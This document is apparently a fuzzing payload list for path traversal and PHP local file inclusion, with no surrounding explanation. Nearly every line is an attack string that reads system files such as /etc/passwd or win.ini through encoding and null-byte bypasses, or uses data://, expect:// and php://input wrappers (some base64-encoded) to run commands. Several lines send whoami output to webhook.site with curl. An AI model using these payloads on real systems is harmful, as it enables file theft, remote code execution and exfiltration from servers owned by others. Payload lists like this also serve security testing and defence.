
....\/....\/....\/
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2fetc%2fpasswd
..%2fetc%2fpasswd
..\..\..\boot.ini
..\..\boot.ini
..\boot.ini
..\..\..\BOOT.INI
data://text/plain;base64,PD9waHAgc3lzdGVtKCdjdXJsIGh0dHA6Ly93ZWJob29rLnNpdGUvdGVzdC8kKHdob2FtaSknKTsgPz4=
data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL2V0Yy9wYXNzd2QnKTsgPz4=
data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
data:://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
data://text/plain;base64,PD9waHAgc3lzdGVtKCdzbGVlcCA1Jyk7ID8+
data://text/plain,<?php%20system('cat%20/etc/passwd');?>
data://text/plain,<?php%20system('curl%20http://webhook.site/test/$(whoami)');?>
data://text/plain,<?php%20system('id');?>
data:://text/plain,<?php%20system('id');?>
data://text/plain,<?php%20system('sleep%205');?>
data://text/plain,<?php%20system('whoami');?>
....\/....\/etc\/
....//....//....//....//....//etc/passwd
....//....//....//....//etc/passwd
....//....//....//etc/passwd
....//....//etc/passwd
..././..././..././..././..././etc/passwd
..././..././..././..././etc/passwd
..././..././..././etc/passwd
..././..././etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../../etc/passwd/.
../../../../etc/passwd/../
../../../../etc/passwd/././
../../../../etc/passwd////////
../../../etc/passwd
../../../etc/passwd# 
../../../etc/passwd#.
../../../etc/passwd.
../../../etc/passwd/.
../../../etc/passwd/. 
../../../etc/passwd/../
../../../etc/passwd?
../../../etc/passwd?.
../../etc/passwd
../etc/passwd
..;/..;/..;/..;/etc/passwd
..;/..;/..;/etc/passwd
..;//..;//..;//..;//etc/passwd
..;//..;//..;//etc/passwd
../../../eTc/pAsSwD
../../../Etc/Passwd
../../../ETC/PASSWD
../../../etc/passwd%00
../../../etc/passwd%00.
../../../etc/passwd%00.html
../../../etc/passwd%00.jpg
../../../etc/passwd%00.php
../../../etc/passwd%00.png
../../../etc/passwd%00.txt
../../../etc/passwd%09
../../../etc/passwd%0d%0a
../../../etc/passwd%20
../../../etc/passwd.html
../../../etc/passwd.jpg
../../../etc/passwd/../passwd
../../../etc/passwd/./passwd
../../../etc/passwd.php
../../../etc/passwd?x
../../../etc/passwd\x00
../../../etc/passwd\x00.gif
../../../etc/passwd\x00.html
../../../etc/passwd\x00.jpg
../../../etc/passwd\x00.php
expect://cat /etc/passwd
expect://curl http://webhook.site/test/$(whoami)
expect://hostname
expect://id
expect://ls -la
expect://pwd
expect://sleep 5
expect://whoami
file.php%00../../../../etc/passwd
file.php%00../../../etc/passwd
file.php\x00../../../etc/passwd
php://filter/convert.base64-encode/resource=....//....//....//etc/passwd
php://filter/convert.base64-encode/resource=../../../etc/passwd
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/convert.base64-encode/resource=file:///etc/passwd
php://filter/convert.iconv.utf-8.utf-16/resource=../../../etc/passwd
php://filter/convert.iconv.utf-8.utf-7/resource=../../../etc/passwd
php://filter/read=convert.base64-encode/resource=../../../etc/passwd
php://filter/read=convert.base64-encode/resource=/etc/passwd
php://filter/read=convert.base64-encode/resource=php://filter/read=convert.base64-encode/resource=config
php://filter/string.rot13/resource=../../../etc/passwd
php://filter/zlib.deflate/convert.base64-encode/resource=../../../etc/passwd
php://input
php://input%00
php://input%00?cmd=id
php://input%20<?php%20system('cat%20/etc/passwd');?>
php://input?cmd=id
..\..\windows\system32\drivers\etc\hosts
..\windows\system32\drivers\etc\hosts
..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\windows\win.ini
..\..\..\..\windows\win.ini
..\..\..\windows\win.ini
..\..\windows\win.ini
..\windows\win.ini
..\..\..\Windows\Win.ini
..\..\..\WINDOWS\WIN.INI
